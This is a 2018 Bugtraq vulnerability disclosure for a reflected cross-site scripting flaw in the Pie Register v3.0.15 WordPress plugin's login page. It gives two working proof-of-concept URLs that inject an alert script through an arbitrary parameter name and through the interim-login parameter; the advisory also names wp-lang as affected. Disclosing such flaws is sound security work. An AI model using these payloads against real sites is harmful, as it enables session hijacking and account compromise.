
Date: Wed, 3 Oct 2018 21:14:06 GMT
From: Socket_0x03@...aexe.com
To: bugtraq@...urityfocus.com
Subject: Pie Register v3.0.15 (WordPress Plugin) - Cross-Site Scripting
 Vulnerability in Login


         =====================================================================================
         Pie Register v3.0.15 (WordPress Plugin) - Cross-Site Scripting Vulnerability in Login
         =====================================================================================

____________________________________________________________________________________


 # Exploit Title: Pie Register v3.0.15 (WordPress Plugin) - Cross-Site Scripting Vulnerability in Login

 # Date: [10-03-2018]

 # Category: Webapps
____________________________________________________________________________________


 # Author: Socket_0x03 (Alvaro J. Gene)

 # Email: Socket_0x03 (at) teraexe (dot) com

 # Website: www.teraexe.com

____________________________________________________________________________________

 # Software Link: https://wordpress.org/plugins/pie-register

 # Plugin: Pie Register

 # Version: v3.0.15 (last version)

 # File: login

 # Parameters: interim-login, wp-lang, and supplied URL.

 # Language: This application is available in English language.

 # Plugin Description: Pie Register is a Word Press plugin that an administrator can 
   use to create different kinds of forms without programming knowledge. In addition, 
   an administrator can use Pie Register for payment features; for example, if an 
   administrator is using Pie Register to provide some kind of service, he/she can
   charge an amount to his/her users via PayPal.
   
____________________________________________________________________________________


 #  Cross-Site Scripting Vulnerability:
 
    Name of an arbitrarily supplied URL parameter:
    http://www.website.com/wordpress/index.php/login/?frfqq"><script>alert(23)</script>rwhn7=1

    Parameters interim-login and wp-lang:
    http://www.website.com/wordpress/index.php/login/?redirect_to=http%3A%2F%2Fwww.website.com%2Fwordpress%2Findex.php%2F2018%2F09%2F27%2Fhello-world%2F&interim-login=zuhke"><script>alert(23)</script>v1ig9&wp_lang=en_US
